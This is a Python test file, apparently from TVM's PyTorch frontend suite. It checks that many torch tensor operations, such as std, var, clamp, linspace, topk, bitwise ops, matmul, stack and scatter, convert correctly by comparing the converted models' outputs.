@tvm.testing.uses_gpu
def test_forward_argmax():
    """Test conversion of Tensor.argmax with positional/keyword dim and keepdim."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class ArgMax1(Module):
        def forward(self, *args):
            return args[0].argmax(1)

    class ArgMax2(Module):
        def forward(self, *args):
            return args[0].argmax(dim=1, keepdim=False)

    class ArgMax3(Module):
        def forward(self, *args):
            return args[0].argmax(dim=2, keepdim=True)

    input_data = torch.rand(input_shape).float()
    verify_model(ArgMax1().float().eval(), input_data=input_data)
    verify_model(ArgMax2().float().eval(), input_data=input_data)
    verify_model(ArgMax3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_std():
    """Test conversion of Tensor.std over single/multiple dims, keepdim, and
    both biased (unbiased=False) and unbiased variants.
    """
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class Std1(Module):
        def forward(self, *args):
            return args[0].std(1, unbiased=False)

    class Std2(Module):
        def forward(self, *args):
            return args[0].std(dim=1, keepdim=False, unbiased=False)

    class Std3(Module):
        def forward(self, *args):
            return args[0].std(dim=2, keepdim=True, unbiased=False)

    class Std4(Module):
        def forward(self, *args):
            return args[0].std(dim=(2, 3), keepdim=True, unbiased=False)

    class Std5(Module):
        def forward(self, *args):
            return args[0].std(dim=(2, 3), keepdim=False, unbiased=False)

    class Std6(Module):
        def forward(self, *args):
            return args[0].std(unbiased=False)

    class Std7(Module):
        def forward(self, *args):
            return args[0].std(dim=1, keepdim=False, unbiased=True)

    class Std8(Module):
        def forward(self, *args):
            return args[0].std(dim=(2, 3), keepdim=True, unbiased=True)

    class Std9(Module):
        def forward(self, *args):
            return args[0].std(unbiased=True)

    input_data = torch.rand(input_shape).float()
    verify_model(Std1().float().eval(), input_data=input_data)
    verify_model(Std2().float().eval(), input_data=input_data)
    verify_model(Std3().float().eval(), input_data=input_data)
    verify_model(Std4().float().eval(), input_data=input_data)
    verify_model(Std5().float().eval(), input_data=input_data)
    verify_model(Std6().float().eval(), input_data=input_data)
    verify_model(Std7().float().eval(), input_data=input_data)
    verify_model(Std8().float().eval(), input_data=input_data)
    verify_model(Std9().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_variance():
    """Test conversion of Tensor.var over single/multiple dims, keepdim, and
    both biased (unbiased=False) and unbiased variants.
    """
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class Variance1(Module):
        def forward(self, *args):
            return args[0].var(1, unbiased=False)

    class Variance2(Module):
        def forward(self, *args):
            return args[0].var(dim=1, keepdim=False, unbiased=False)

    class Variance3(Module):
        def forward(self, *args):
            return args[0].var(dim=2, keepdim=True, unbiased=False)

    class Variance4(Module):
        def forward(self, *args):
            return args[0].var(dim=(2, 3), keepdim=True, unbiased=False)

    class Variance5(Module):
        def forward(self, *args):
            return args[0].var(dim=(2, 3), keepdim=False, unbiased=False)

    class Variance6(Module):
        def forward(self, *args):
            return args[0].var(unbiased=False)

    class Variance7(Module):
        def forward(self, *args):
            return args[0].var(dim=1, keepdim=False, unbiased=True)

    class Variance8(Module):
        def forward(self, *args):
            return args[0].var(dim=(2, 3), keepdim=True, unbiased=True)

    class Variance9(Module):
        def forward(self, *args):
            return args[0].var(unbiased=True)

    input_data = torch.rand(input_shape).float()
    verify_model(Variance1().float().eval(), input_data=input_data)
    verify_model(Variance2().float().eval(), input_data=input_data)
    verify_model(Variance3().float().eval(), input_data=input_data)
    verify_model(Variance4().float().eval(), input_data=input_data)
    verify_model(Variance5().float().eval(), input_data=input_data)
    verify_model(Variance6().float().eval(), input_data=input_data)
    verify_model(Variance7().float().eval(), input_data=input_data)
    verify_model(Variance8().float().eval(), input_data=input_data)
    verify_model(Variance9().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_rsub():
    """Test conversion of torch.rsub with default and explicit alpha, and with
    mixed float/int operand dtypes.
    """
    torch.set_grad_enabled(False)

    class Rsub1(Module):
        def forward(self, *args):
            return torch.rsub(args[0], args[1])

    class Rsub2(Module):
        def forward(self, *args):
            return torch.rsub(args[0], args[1], alpha=0.5)

    d1 = torch.rand([1, 3]).float()
    d2 = torch.rand([1, 3]).float()
    d3 = torch.rand([1, 3]).int()
    verify_model(Rsub1().float().eval(), input_data=[d1, d2])
    verify_model(Rsub1().float().eval(), input_data=[d1, d3])
    verify_model(Rsub2().float().eval(), input_data=[d1, d2])
    verify_model(Rsub2().float().eval(), input_data=[d1, d3])
@tvm.testing.uses_gpu
def test_forward_embedding():
    """Test conversion of torch.nn.Embedding, including sparse=True/False."""
    torch.set_grad_enabled(False)
    input_data = torch.randint(0, 10, [2, 4]).long()
    verify_model(torch.nn.Embedding(10, 3).float().eval(), input_data=input_data)
    input_data = torch.randint(0, 4, [2, 3, 4]).long()
    verify_model(torch.nn.Embedding(4, 5, sparse=False).float().eval(), input_data=input_data)
    input_data = torch.randint(0, 4, [2, 3, 4]).long()
    verify_model(torch.nn.Embedding(4, 5, sparse=True).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_onehot():
    """Test conversion of torch.nn.functional.one_hot for two num_classes values."""
    torch.set_grad_enabled(False)

    class OneHot1(Module):
        def forward(self, *args):
            return torch.nn.functional.one_hot(args[0], num_classes=3)

    class OneHot2(Module):
        def forward(self, *args):
            return torch.nn.functional.one_hot(args[0], num_classes=5)

    input_data = torch.arange(0, 5) % 3
    verify_model(OneHot1().float().eval(), input_data=input_data)
    input_data = torch.arange(0, 5) % 4
    verify_model(OneHot2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isfinite():
    """Test conversion of torch.isfinite on inputs containing inf/-inf/nan."""
    torch.set_grad_enabled(False)

    class IsFinite1(Module):
        def forward(self, *args):
            return torch.isfinite(args[0])

    input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
    verify_model(IsFinite1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isnan():
    """Test conversion of torch.isnan on inputs containing inf/-inf/nan."""
    torch.set_grad_enabled(False)

    class IsNan1(Module):
        def forward(self, *args):
            return torch.isnan(args[0])

    input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
    verify_model(IsNan1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isinf():
    """Test conversion of torch.isinf on inputs containing inf/-inf/nan."""
    torch.set_grad_enabled(False)

    class IsInf1(Module):
        def forward(self, *args):
            return torch.isinf(args[0])

    input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
    verify_model(IsInf1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_clamp():
    """Test conversion of torch.clamp with both bounds, only min, and only max."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class Clamp1(Module):
        def forward(self, *args):
            return torch.clamp(args[0], min=-0.5, max=0.5)

    class Clamp2(Module):
        def forward(self, *args):
            return torch.clamp(args[0], min=-0.3)

    class Clamp3(Module):
        def forward(self, *args):
            return torch.clamp(args[0], max=1.0)

    input_data = torch.rand(input_shape).float()
    verify_model(Clamp1().float().eval(), input_data=input_data)
    verify_model(Clamp2().float().eval(), input_data=input_data)
    verify_model(Clamp3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_clamp_():
    """Test conversion of the in-place variant torch.clamp_."""
    torch.set_grad_enabled(False)

    class ClampInPlace(Module):
        # NOTE: parameter names `min`/`max` shadow builtins; kept for
        # interface compatibility with existing callers.
        def __init__(self, min, max):
            super(ClampInPlace, self).__init__()
            self.min = min
            self.max = max

        def forward(self, *args):
            return torch.clamp_(args[0], self.min, self.max)

    for ishape, min, max in (([4, 8], 0.1, 0.9), ([7, 6], 0.2, 0.5)):
        input_data = torch.rand(ishape).float()
        verify_model(ClampInPlace(min, max).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_ones():
    """Test conversion of torch.ones (constant creation, no inputs)."""
    torch.set_grad_enabled(False)

    class Ones1(Module):
        def forward(self, *args):
            return torch.ones(2, 3)

    verify_model(Ones1().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_ones_like():
    """Test conversion of torch.ones_like with default and explicit dtypes."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class OnesLike1(Module):
        def forward(self, *args):
            return torch.ones_like(args[0])

    class OnesLike2(Module):
        def forward(self, *args):
            return torch.ones_like(args[0], dtype=torch.int8)

    class OnesLike3(Module):
        def forward(self, *args):
            return torch.ones_like(args[0], dtype=torch.float)

    input_data = torch.rand(input_shape).float()
    verify_model(OnesLike1().float().eval(), input_data=input_data)
    verify_model(OnesLike2().float().eval(), input_data=input_data)
    verify_model(OnesLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_zeros():
    """Test conversion of torch.zeros (constant creation, no inputs)."""
    torch.set_grad_enabled(False)

    class Zeros1(Module):
        def forward(self, *args):
            return torch.zeros(2, 3)

    verify_model(Zeros1().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_zeros_like():
    """Test conversion of torch.zeros_like with default and explicit dtypes."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class ZerosLike1(Module):
        def forward(self, *args):
            return torch.zeros_like(args[0])

    class ZerosLike2(Module):
        def forward(self, *args):
            return torch.zeros_like(args[0], dtype=torch.int32)

    class ZerosLike3(Module):
        def forward(self, *args):
            return torch.zeros_like(args[0], dtype=torch.float)

    input_data = torch.rand(input_shape).float()
    verify_model(ZerosLike1().float().eval(), input_data=input_data)
    verify_model(ZerosLike2().float().eval(), input_data=input_data)
    verify_model(ZerosLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_full():
    """Test conversion of torch.full with default and explicit dtype."""
    torch.set_grad_enabled(False)

    class Full1(Module):
        def forward(self, *args):
            return torch.full((2, 3), 3.14)

    class Full2(Module):
        def forward(self, *args):
            return torch.full((1, 2, 3), 1.0, dtype=torch.int32)

    verify_model(Full1().float().eval(), input_data=[])
    verify_model(Full2().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_full_like():
    """Test conversion of torch.full_like with default and explicit dtypes."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class FullLike1(Module):
        def forward(self, *args):
            return torch.full_like(args[0], 3.14)

    class FullLike2(Module):
        def forward(self, *args):
            return torch.full_like(args[0], 22.22, dtype=torch.int32)

    class FullLike3(Module):
        def forward(self, *args):
            return torch.full_like(args[0], 1.4, dtype=torch.float)

    input_data = torch.rand(input_shape).float()
    verify_model(FullLike1().float().eval(), input_data=input_data)
    verify_model(FullLike2().float().eval(), input_data=input_data)
    verify_model(FullLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_linspace():
    """Test conversion of torch.linspace across steps/dtype argument variants
    (including the default-steps form and integer dtypes).
    """
    torch.set_grad_enabled(False)

    class Linspace1(Module):
        def forward(self, *args):
            return torch.linspace(5, 10)

    class Linspace2(Module):
        def forward(self, *args):
            return torch.linspace(-10, 10, steps=5)

    class Linspace3(Module):
        def forward(self, *args):
            return torch.linspace(start=-10, end=10, steps=5)

    class Linspace4(Module):
        def forward(self, *args):
            return torch.linspace(start=-10, end=10, steps=1)

    class Linspace5(Module):
        def forward(self, *args):
            return torch.linspace(1, 2, 1, dtype=torch.int32)

    class Linspace6(Module):
        def forward(self, *args):
            return torch.linspace(start=1, end=6, steps=2)

    class Linspace7(Module):
        def forward(self, *args):
            return torch.linspace(1, 4, dtype=torch.float32)

    class Linspace8(Module):
        def forward(self, *args):
            return torch.linspace(1, 2, 1, dtype=torch.int16)

    verify_model(Linspace1().float().eval())
    verify_model(Linspace2().float().eval())
    verify_model(Linspace3().float().eval())
    verify_model(Linspace4().float().eval())
    verify_model(Linspace5().float().eval())
    verify_model(Linspace6().float().eval())
    verify_model(Linspace7().float().eval())
    verify_model(Linspace8().float().eval())
@tvm.testing.uses_gpu
def test_forward_take():
    """Test conversion of torch.take with constant and input-supplied indices."""
    torch.set_grad_enabled(False)

    class Take1(Module):
        def forward(self, *args):
            indices = torch.tensor([[0, 0], [1, 0]])
            # Move the constant indices to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                indices = indices.cuda()
            return torch.take(args[0], indices)

    class Take2(Module):
        def forward(self, *args):
            return torch.take(args[0], args[1])

    input_data = torch.tensor([[1, 2], [3, 4]])
    verify_model(Take1().float().eval(), input_data=input_data)
    indices = torch.tensor([[0, 0], [1, 0]])
    verify_model(Take2().float().eval(), input_data=[input_data, indices])
@tvm.testing.uses_gpu
def test_forward_topk():
    """Test conversion of torch.topk over dim/largest/sorted variants."""
    torch.set_grad_enabled(False)

    class Topk1(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3)

    class Topk2(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3, dim=-2)

    class Topk3(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3, dim=3)

    class Topk4(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3, largest=True)

    class Topk5(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3, largest=False)

    class Topk6(Module):
        def forward(self, *args):
            return torch.topk(args[0], k=3, sorted=True)

    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(Topk1().float().eval(), input_data=input_data)
    verify_model(Topk2().float().eval(), input_data=input_data)
    verify_model(Topk3().float().eval(), input_data=input_data)
    verify_model(Topk4().float().eval(), input_data=input_data)
    verify_model(Topk5().float().eval(), input_data=input_data)
    verify_model(Topk6().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_logical_not():
    """Test conversion of torch.logical_not on bool, int, and float inputs."""
    torch.set_grad_enabled(False)

    class LogicalNot1(Module):
        def forward(self, *args):
            return torch.logical_not(args[0])

    input_data = torch.tensor([True, False])
    verify_model(LogicalNot1().float().eval(), input_data=input_data)
    input_data = torch.tensor([0, 1, -10], dtype=torch.int8)
    verify_model(LogicalNot1().float().eval(), input_data=input_data)
    input_data = torch.tensor([0.0, 1.5, -10.0], dtype=torch.double)
    verify_model(LogicalNot1().float().eval(), input_data=input_data)
    input_data = torch.tensor([0.0, 1.0, -10.0], dtype=torch.int32)
    verify_model(LogicalNot1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_bitwise_not():
    """Test conversion of torch.bitwise_not on int8, int32, and bool inputs."""
    torch.set_grad_enabled(False)

    class BitwiseNot1(Module):
        def forward(self, *args):
            return torch.bitwise_not(args[0])

    input_data = torch.tensor([0, 1, -10], dtype=torch.int8)
    verify_model(BitwiseNot1().float().eval(), input_data=input_data)
    input_data = torch.tensor([0.0, 1.0, -10.0], dtype=torch.int32)
    verify_model(BitwiseNot1().float().eval(), input_data=input_data)
    input_data = torch.tensor([True, False])
    verify_model(BitwiseNot1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_bitwise_xor():
    """Test conversion of torch.bitwise_xor with tensor-tensor and
    tensor-constant operands, on int8 and bool inputs.
    """
    torch.set_grad_enabled(False)

    class BitwiseXor1(Module):
        def forward(self, *args):
            return torch.bitwise_xor(args[0], args[1])

    class BitwiseXor2(Module):
        def forward(self, *args):
            rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
            # Move the constant to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                rhs = rhs.cuda()
            return torch.bitwise_xor(args[0], rhs)

    lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
    rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
    verify_model(BitwiseXor1().float().eval(), input_data=[lhs, rhs])
    lhs = torch.tensor([True, True, False])
    rhs = torch.tensor([False, True, False])
    verify_model(BitwiseXor1().float().eval(), input_data=[lhs, rhs])
    lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
    verify_model(BitwiseXor2().float().eval(), input_data=[lhs])
@tvm.testing.uses_gpu
def test_forward_logical_xor():
    """Test conversion of torch.logical_xor with tensor-tensor and
    tensor-constant operands, on int8 and bool inputs.
    """
    torch.set_grad_enabled(False)

    class LogicalXor1(Module):
        def forward(self, *args):
            return torch.logical_xor(args[0], args[1])

    class LogicalXor2(Module):
        def forward(self, *args):
            rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
            # Move the constant to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                rhs = rhs.cuda()
            return torch.logical_xor(args[0], rhs)

    lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
    rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
    verify_model(LogicalXor1().float().eval(), input_data=[lhs, rhs])
    lhs = torch.tensor([True, True, False])
    rhs = torch.tensor([False, True, False])
    verify_model(LogicalXor1().float().eval(), input_data=[lhs, rhs])
    lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
    verify_model(LogicalXor2().float().eval(), input_data=[lhs])
@tvm.testing.uses_gpu
def test_forward_unary():
    """Test conversion of elementwise unary ops (sqrt, trig, log family, exp,
    erf, rounding, sign, neg) — one wrapper Module per op.
    """
    torch.set_grad_enabled(False)

    class Sqrt1(Module):
        def forward(self, *args):
            return torch.sqrt(args[0])

    class RSqrt1(Module):
        def forward(self, *args):
            return torch.rsqrt(args[0])

    class Ceil1(Module):
        def forward(self, *args):
            return torch.ceil(args[0])

    class Floor1(Module):
        def forward(self, *args):
            return torch.floor(args[0])

    class Round1(Module):
        def forward(self, *args):
            return torch.round(args[0])

    class Cos1(Module):
        def forward(self, *args):
            return torch.cos(args[0])

    class Sin1(Module):
        def forward(self, *args):
            return torch.sin(args[0])

    class Tan1(Module):
        def forward(self, *args):
            return torch.tan(args[0])

    class Tanh1(Module):
        def forward(self, *args):
            return torch.tanh(args[0])

    class Acos1(Module):
        def forward(self, *args):
            return torch.acos(args[0])

    class Asin1(Module):
        def forward(self, *args):
            return torch.asin(args[0])

    class Atan1(Module):
        def forward(self, *args):
            return torch.atan(args[0])

    class Log1(Module):
        def forward(self, *args):
            return torch.log(args[0])

    class Exp1(Module):
        def forward(self, *args):
            return torch.exp(args[0])

    class Erf1(Module):
        def forward(self, *args):
            return torch.erf(args[0])

    class Trunc1(Module):
        def forward(self, *args):
            return torch.trunc(args[0])

    class Sign1(Module):
        def forward(self, *args):
            return torch.sign(args[0])

    class Neg1(Module):
        def forward(self, *args):
            return torch.neg(args[0])

    class Sinh1(Module):
        def forward(self, *args):
            return torch.sinh(args[0])

    class Cosh1(Module):
        def forward(self, *args):
            return torch.cosh(args[0])

    class Log2_1(Module):
        def forward(self, *args):
            return torch.log2(args[0])

    class Log10_1(Module):
        def forward(self, *args):
            return torch.log10(args[0])

    class Log1p_1(Module):
        def forward(self, *args):
            return torch.log1p(args[0])

    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(Sqrt1().float().eval(), input_data=input_data)
    verify_model(RSqrt1().float().eval(), input_data=input_data)
    verify_model(Ceil1().float().eval(), input_data=input_data)
    verify_model(Floor1().float().eval(), input_data=input_data)
    verify_model(Round1().float().eval(), input_data=input_data)
    verify_model(Cos1().float().eval(), input_data=input_data)
    verify_model(Cosh1().float().eval(), input_data=input_data)
    verify_model(Sin1().float().eval(), input_data=input_data)
    verify_model(Sinh1().float().eval(), input_data=input_data)
    verify_model(Tan1().float().eval(), input_data=input_data)
    verify_model(Tanh1().float().eval(), input_data=input_data)
    verify_model(Acos1().float().eval(), input_data=input_data)
    verify_model(Asin1().float().eval(), input_data=input_data)
    verify_model(Atan1().float().eval(), input_data=input_data)
    verify_model(Log1().float().eval(), input_data=input_data)
    verify_model(Log2_1().float().eval(), input_data=input_data)
    verify_model(Log10_1().float().eval(), input_data=input_data)
    verify_model(Log1p_1().float().eval(), input_data=input_data)
    verify_model(Exp1().float().eval(), input_data=input_data)
    verify_model(Erf1().float().eval(), input_data=input_data)
    verify_model(Trunc1().float().eval(), input_data=input_data)
    verify_model(Sign1().float().eval(), input_data=input_data)
    verify_model(Neg1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_where():
    """Test conversion of torch.where: ternary form with constant and input
    operands, plus the single-argument (nonzero-like) form.
    """
    torch.set_grad_enabled(False)

    class Where1(Module):
        def forward(self, *args):
            y = torch.ones([3, 2])
            # Move the constant to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                y = y.cuda()
            return torch.where(args[0] > 0, args[0], y)

    class Where2(Module):
        def forward(self, *args):
            return torch.where(args[0] > 0, args[0], args[1])

    class Where3(Module):
        def forward(self, *args):
            return torch.where(args[0])[0]

    x = torch.rand([3, 2]).float()
    verify_model(Where1(), input_data=[x])
    y = torch.rand([3, 2])
    verify_model(Where2(), input_data=[x, y])
    # a single argument variant, equivalent to torch.nonzero(..., as_tuple=True)
    inp = torch.rand([10])
    inp[3:8] = 0
    verify_trace_model(Where3(), [inp], ["llvm"])
@tvm.testing.uses_gpu
def test_forward_addcdiv():
    """Test conversion of torch.addcdiv with constant and input-supplied
    broadcastable tensors.
    """
    torch.set_grad_enabled(False)

    class Addcdiv1(Module):
        def forward(self, *args):
            t1 = torch.ones([3, 1])
            t2 = torch.ones([1, 3])
            # Move the constants to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                t1 = t1.cuda()
                t2 = t2.cuda()
            return torch.addcdiv(args[0], 0.1, t1, t2)

    class Addcdiv2(Module):
        def forward(self, *args):
            return torch.addcdiv(args[0], 0.5, args[1], args[2])

    input_data = torch.rand([1, 3]).float()
    verify_model(Addcdiv1().float().eval(), input_data=input_data)
    t1 = torch.rand([3, 1]).float()
    t2 = torch.rand([1, 3]).float()
    verify_model(Addcdiv2().float().eval(), input_data=[input_data, t1, t2])
@tvm.testing.uses_gpu
def test_forward_addcmul():
    """Test conversion of torch.addcmul with constant and input-supplied
    broadcastable tensors.
    """
    torch.set_grad_enabled(False)

    class Addcmul1(Module):
        def forward(self, *args):
            t1 = torch.ones([3, 1])
            t2 = torch.ones([1, 3])
            # Move the constants to GPU so devices match under CUDA.
            if torch.cuda.is_available():
                t1 = t1.cuda()
                t2 = t2.cuda()
            return torch.addcmul(args[0], 0.1, t1, t2)

    class Addcmul2(Module):
        def forward(self, *args):
            return torch.addcmul(args[0], 0.5, args[1], args[2])

    input_data = torch.rand([1, 3]).float()
    verify_model(Addcmul1().float().eval(), input_data=input_data)
    t1 = torch.rand([3, 1]).float()
    t2 = torch.rand([1, 3]).float()
    verify_model(Addcmul2().float().eval(), input_data=[input_data, t1, t2])
@tvm.testing.uses_gpu
def test_forward_true_divide():
    """Test conversion of torch.true_divide with tensor and scalar divisors.

    Skipped (early return) on torch < 1.5.0, where true_divide was introduced.
    """
    if package_version.parse(torch.__version__) < package_version.parse("1.5.0"):
        return
    torch.set_grad_enabled(False)

    class TrueDivide(Module):
        def forward(self, *args):
            return torch.true_divide(args[0], args[1])

    dividend = torch.rand([5, 3]).float()
    # divisor could be either tensor or scalar
    divisor_tensor = torch.rand([5, 3]).float() + 0.5
    divisor_scalar = torch.tensor(1.0, dtype=torch.float32)
    verify_model(
        TrueDivide().float().eval(), input_data=[dividend, divisor_tensor], atol=1e-4, rtol=1e-4
    )
    verify_model(
        TrueDivide().float().eval(), input_data=[dividend, divisor_scalar], atol=1e-4, rtol=1e-4
    )
@tvm.testing.uses_gpu
def test_forward_traced_function():
    """Test conversion of a plain Python function (not an nn.Module)."""

    def fn(t1, t2):
        return t1 + t2

    tensor1 = torch.randn(3, 4)
    tensor2 = torch.randn(3, 4)
    verify_model(fn, input_data=[tensor1, tensor2])
@tvm.testing.uses_gpu
def test_forward_dtypes():
    """Test conversion across input dtypes (int32, int64, double) and with an
    integer (Long) module parameter.
    """

    def fn(t1, t2):
        return 2.5 * t1 + t2

    for dt in [torch.int32, torch.int64, torch.double]:
        tensor1 = torch.randn(3, 4).to(dtype=dt)
        tensor2 = torch.randn(3, 4).to(dtype=dt)
        verify_model(fn, input_data=[tensor1, tensor2])

    class ModuleWithIntParameters(Module):
        def __init__(self, arr):
            super().__init__()
            self.param = torch.nn.Parameter(torch.LongTensor(arr), requires_grad=False)

        def forward(self, x):
            return x.long() + self.param

    shape = (10, 10)
    param = torch.ones(shape, dtype=torch.long)
    inp = torch.ones(shape, dtype=torch.int)
    verify_model(ModuleWithIntParameters(param), input_data=inp)
@tvm.testing.uses_gpu
def test_weight_names():
    """Check that Relay parameter names match the traced module's named_parameters."""
    tm = torch.jit.trace(torch.nn.Linear(3, 4), [torch.randn(2, 3)])
    mod, params = relay.frontend.from_pytorch(tm, [("input", (2, 3))])
    assert set(params.keys()) == set(n for n, p in tm.named_parameters())
@tvm.testing.uses_gpu
def test_duplicate_weight_use():
    """Test conversion when the same weight tensor is used twice.

    The test cases doesn't make any sense as a neural network;
    the issue popped up in shared input/output embeddings of bert,
    but this is quicker.
    """

    class Test(Module):
        def __init__(self):
            super().__init__()
            self.lin = torch.nn.Linear(5, 3)

        def forward(self, x):
            x = self.lin(x)
            # Reuse the linear layer's weight directly — the duplicate use.
            x = x @ self.lin.weight
            return x

    verify_model(Test(), input_data=[torch.randn(5, 5)])
@tvm.testing.uses_gpu
def test_forward_matmul():
    """Test conversion of torch.matmul across its broadcasting cases:
    matrix-vector, matrix-matrix, batched, and batched-with-broadcast.
    """
    torch.set_grad_enabled(False)

    class MatMul1(Module):
        def forward(self, *args):
            return torch.matmul(args[0], args[1])

    # matrix x vector
    tensor1 = torch.randn(3, 4)
    tensor2 = torch.randn(4)
    verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
    # matrix x matrix
    tensor1 = torch.randn(10, 4)
    tensor2 = torch.randn(4, 10)
    verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
    # batched matrix x batched matrix
    tensor1 = torch.randn(10, 3, 4)
    tensor2 = torch.randn(10, 4, 5)
    verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
    # batched matrix x broadcasted matrix
    tensor1 = torch.randn(10, 3, 4)
    tensor2 = torch.randn(4, 5)
    verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
    # batched matrix x batched matrix
    tensor1 = torch.randn(1, 12, 14, 64)
    tensor2 = torch.randn(1, 12, 64, 14)
    verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
def test_forward_index():
    """Test conversion of advanced (fancy) indexing with list indices and slices."""
    torch.set_grad_enabled(False)
    input_shape = [3, 4, 5, 6]

    class Index0(Module):
        def forward(self, x):
            return x[[0, 1], [0, 2], :2, 4]

    input_data = torch.rand(input_shape).float()
    verify_model(Index0().eval(), input_data=input_data)

    class Index1(Module):
        def forward(self, x):
            return x[[0], [1, 2, 3, 0], [3, 1, 2, 2], [4, 2, 1, 0]]

    input_data = torch.rand(input_shape).float()
    verify_model(Index1().eval(), input_data=input_data)
def test_logsumexp():
    """torch.logsumexp along a dim, with/without keepdim, in float and double."""

    class Logsumexp(Module):
        def __init__(self, dim, keepdim=False):
            super().__init__()
            self.dim = dim
            self.keepdim = keepdim

        def forward(self, x):
            return torch.logsumexp(x, self.dim, self.keepdim)

    input_data = torch.rand((100, 100))
    verify_model(Logsumexp(0), input_data=input_data)
    verify_model(Logsumexp(0, keepdim=True), input_data=input_data)
    # Also exercise double precision.
    verify_model(Logsumexp(1, keepdim=True), input_data=input_data.double())
def test_stack():
    """torch.stack of a tensor with itself on positive, negative, and boundary axes."""

    class Stack(torch.nn.Module):
        def __init__(self, axis=0):
            super().__init__()
            self.axis = axis

        def forward(self, x):
            return torch.stack((x, x), dim=self.axis)

    inp = torch.randn(8, 8, 8)
    # Axis 0 (default), last axis, one-past-last, and fully negative.
    for axis in (0, -1, 3, -4):
        verify_model(Stack(axis=axis), input_data=inp)
def test_stack_dynamic():
    """Stack a data-dependent number of tensors (exercises the relay tensor-array path)."""

    class Stack(torch.nn.Module):
        def forward(self, x):
            tensor_list = []
            for i in range(x.size(0)):
                # this is a workaround to avoid generating impure aten::append op
                tensor_list += [x[i]]
            # relay tensor array only supports stacking on the first axis
            return torch.stack(tensor_list, dim=0)

    verify_script_model(Stack(), [(8, 8, 8)], _get_default_vm_targets())
def test_forward_unbind():
    """torch.unbind along each axis of a rank-3 tensor."""

    class Unbind(torch.nn.Module):
        def __init__(self, axis=0):
            super().__init__()
            self.axis = axis

        def forward(self, x):
            return torch.unbind(x, self.axis)

    inp = torch.randn(8, 8, 8)
    for axis in (0, 1, 2):
        verify_model(Unbind(axis), input_data=inp)
def test_forward_nonzero():
    """torch.nonzero (as_tuple=False) through the trace path on llvm."""

    class Nonzero(Module):
        def __init__(self, as_tuple=False):
            super().__init__()
            self.as_tuple = as_tuple

        def forward(self, data):
            return torch.nonzero(data, as_tuple=self.as_tuple)

    # Mix of zero, positive, and negative entries so the result is non-trivial.
    inp = torch.Tensor(np.array([[0, 1, 0], [2, 0, 9], [-1, -1, 0]]).astype("float32"))
    verify_trace_model(Nonzero(), [inp], ["llvm"])
def test_forward_scatter():
    """torch.scatter along dim 0 and dim 1 (CPU only; see TODO below)."""

    class Scatter(Module):
        def __init__(self, dim=0):
            super().__init__()
            self.dim = dim

        def forward(self, data, index, src):
            return torch.scatter(data, dim=self.dim, index=index, src=src)

    # dim=0 case
    in_data = torch.zeros(3, 5)
    in_index = torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]])
    in_src = torch.rand(2, 5)
    # TODO: add scatter gpu schedule to enable gpu test.
    verify_trace_model(Scatter(), [in_data, in_index, in_src], ["llvm"])

    # dim=1 case
    in_data = torch.zeros(2, 4)
    in_index = torch.tensor([[2], [3]])
    in_src = torch.rand(2, 1)
    # TODO: add scatter gpu schedule to enable gpu test.
    verify_trace_model(Scatter(1), [in_data, in_index, in_src], ["llvm"])
